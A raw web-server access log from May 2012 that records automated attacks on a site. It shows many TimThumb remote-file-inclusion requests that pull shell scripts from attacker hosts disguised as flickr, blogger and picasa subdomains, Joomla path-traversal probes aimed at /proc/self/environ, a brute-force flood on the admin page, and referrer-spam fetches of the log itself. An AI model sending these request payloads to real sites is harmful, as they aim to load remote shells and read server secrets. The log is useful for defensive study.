46.45.138.202 - - [14/May/2012:01:03:22 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:22 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:22 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:23 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:23 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:23 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:24 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:01:03:40 +0200] "GET /logs/access_log HTTP/1.0" 200 51826 "http://playdooandroid.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
46.45.138.202 - - [14/May/2012:01:03:41 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:01:03:41 +0200] "GET /logs/access_log HTTP/1.0" 200 52027 "http://playdooandroid.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
78.137.37.171 - - [14/May/2012:01:03:41 +0200] "GET /logs/access_log HTTP/1.0" 200 52558 "http://playdooandroid.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
78.137.37.171 - - [14/May/2012:01:03:42 +0200] "GET /logs/access_log HTTP/1.0" 200 52800 "http://playdooandroid.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
46.45.138.202 - - [14/May/2012:01:03:42 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:01:03:42 +0200] "GET /logs/access_log HTTP/1.0" 200 53008 "http://playdooandroid.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
46.45.138.202 - - [14/May/2012:01:03:44 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:04:26 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:26 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:27 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:27 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:04:27 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:27 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:28 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:28 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:28 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:04:29 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:29 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:04:29 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.69.134.91 - - [14/May/2012:01:06:48 +0200] "GET /sitemap.xml HTTP/1.0" 200 297 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0)"
78.137.37.171 - - [14/May/2012:01:07:13 +0200] "GET /logs/access_log HTTP/1.0" 200 57209 "http://playdooandroid.info/sitemap252.html" "Opera/9.00 (Windows NT 5.1; U; en)"
78.137.37.171 - - [14/May/2012:01:07:14 +0200] "GET /logs/access_log HTTP/1.0" 200 57380 "http://playdooandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
78.137.37.171 - - [14/May/2012:01:07:14 +0200] "GET /logs/access_log HTTP/1.0" 200 57592 "http://playdooandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:01:07:15 +0200] "GET /logs/access_log HTTP/1.0" 200 57779 "http://playdooandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
78.137.37.171 - - [14/May/2012:01:07:15 +0200] "GET /logs/access_log HTTP/1.0" 200 57981 "http://playdooandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:01:07:35 +0200] "GET /logs/access_log HTTP/1.0" 200 58205 "http://androideosoft.info/sitemap245.html" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.132.213.162 - - [14/May/2012:01:07:42 +0200] "GET /logs/access_log HTTP/1.0" 200 58389 "http://androideosoft.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:01:07:48 +0200] "GET /logs/access_log HTTP/1.0" 200 58656 "http://androideosoft.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
95.132.213.162 - - [14/May/2012:01:07:52 +0200] "GET /logs/access_log HTTP/1.0" 200 58857 "http://androideosoft.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
95.132.213.162 - - [14/May/2012:01:07:55 +0200] "GET /logs/access_log HTTP/1.0" 200 59058 "http://androideosoft.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.69.134.91 - - [14/May/2012:01:08:24 +0200] "GET /sitemap.xml HTTP/1.0" 200 297 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0)"
95.173.163.104 - - [14/May/2012:01:10:36 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:01:10:37 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:01:10:38 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:01:10:40 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
37.59.175.236 - - [14/May/2012:01:10:52 +0200] "GET / HTTP/1.1" 200 945 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
78.137.37.171 - - [14/May/2012:01:10:52 +0200] "GET /logs/access_log HTTP/1.0" 200 60514 "http://playdooandroid.info/sitemap259.html" "Opera/8.00 (Windows NT 5.1; U; en)"
37.59.175.236 - - [14/May/2012:01:10:53 +0200] "GET / HTTP/1.1" 200 945 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
78.137.37.171 - - [14/May/2012:01:10:53 +0200] "GET /logs/access_log HTTP/1.0" 200 60969 "http://playdooandroid.info/sitemap259.html" "Opera/8.01 (Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:01:10:53 +0200] "GET /logs/access_log HTTP/1.0" 200 61133 "http://playdooandroid.info/sitemap259.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)"
78.137.37.171 - - [14/May/2012:01:10:54 +0200] "GET /logs/access_log HTTP/1.0" 200 61339 "http://playdooandroid.info/sitemap259.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:01:10:54 +0200] "GET /logs/access_log HTTP/1.0" 200 61535 "http://playdooandroid.info/sitemap259.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
176.42.111.185 - - [14/May/2012:01:11:30 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:30 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:30 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:30 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:30 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:31 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:32 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
90.198.87.118 - - [14/May/2012:01:11:33 +0200] "GET /stats//wp-content/themes/abstract/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
176.42.111.185 - - [14/May/2012:01:11:33 +0200] "GET /administrator/index.php HTTP/1.1" 404 305 "-" "-"
90.198.87.118 - - [14/May/2012:01:11:34 +0200] "GET /stats//wp-content/themes/abstract/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:11:35 +0200] "GET //wp-content/themes/abstract/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:11:37 +0200] "GET //wp-content/themes/abstract/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:01:11:42 +0200] "GET /stats/index.html//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:01:11:43 +0200] "GET /stats/index.html//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
78.137.37.171 - - [14/May/2012:01:14:26 +0200] "GET /logs/access_log HTTP/1.0" 200 67678 "http://playdooandroid.info/sitemap266.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
78.137.37.171 - - [14/May/2012:01:14:28 +0200] "GET /logs/access_log HTTP/1.0" 200 67861 "http://playdooandroid.info/sitemap266.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:01:14:28 +0200] "GET /logs/access_log HTTP/1.0" 200 68067 "http://playdooandroid.info/sitemap266.html" "Opera/7.54 (Windows NT 5.1; U) [pl]"
78.137.37.171 - - [14/May/2012:01:14:28 +0200] "GET /logs/access_log HTTP/1.0" 200 68240 "http://playdooandroid.info/sitemap266.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)"
78.137.37.171 - - [14/May/2012:01:14:29 +0200] "GET /logs/access_log HTTP/1.0" 200 68424 "http://playdooandroid.info/sitemap266.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
184.173.6.208 - - [14/May/2012:01:14:39 +0200] "GET /stats/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/6.04"
184.173.6.208 - - [14/May/2012:01:14:39 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/6.04"
89.33.197.242 - - [14/May/2012:01:15:19 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:15:19 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:15:20 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:15:20 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:15:20 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:15:20 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:01:16:23 +0200] "GET /stats//wp-content/themes/kingsize/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:01:16:23 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:43 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:43 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:44 +0200] "GET /stats//wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:44 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:44 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:01:16:45 +0200] "GET //wp-content/themes/deep-blue/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:01:17:43 +0200] "GET /stats//wp-content/themes/kingsize/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.98.95 - - [14/May/2012:01:17:43 +0200] "GET //wp-content/themes/kingsize/timthumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:01:17:48 +0200] "GET /logs/access_log HTTP/1.0" 200 72980 "http://androideosoft.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
95.132.213.162 - - [14/May/2012:01:17:51 +0200] "GET /logs/access_log HTTP/1.0" 200 73210 "http://androideosoft.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6"
95.132.213.162 - - [14/May/2012:01:17:52 +0200] "GET /logs/access_log HTTP/1.0" 200 73431 "http://androideosoft.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
95.132.213.162 - - [14/May/2012:01:17:53 +0200] "GET /logs/access_log HTTP/1.0" 200 73639 "http://androideosoft.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]"
95.132.213.162 - - [14/May/2012:01:17:57 +0200] "GET /logs/access_log HTTP/1.0" 200 73839 "http://androideosoft.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:01:17:58 +0200] "GET /logs/access_log HTTP/1.0" 200 74050 "http://playdooandroid.info/sitemap273.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
78.137.37.171 - - [14/May/2012:01:17:59 +0200] "GET /logs/access_log HTTP/1.0" 200 74251 "http://playdooandroid.info/sitemap273.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:01:17:59 +0200] "GET /logs/access_log HTTP/1.0" 200 74498 "http://playdooandroid.info/sitemap273.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)"
78.137.37.171 - - [14/May/2012:01:18:00 +0200] "GET /logs/access_log HTTP/1.0" 200 74682 "http://playdooandroid.info/sitemap273.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
